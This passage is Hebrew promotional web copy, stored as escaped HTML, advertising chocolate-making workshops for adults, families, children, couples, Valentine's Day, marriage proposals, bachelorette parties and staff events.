\\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5. <br \\/><br \\/>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h3><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea. <br \\/><br \\/>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h3><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea. <br \\/><br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><p>\\u00a0<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h3><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h3><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df 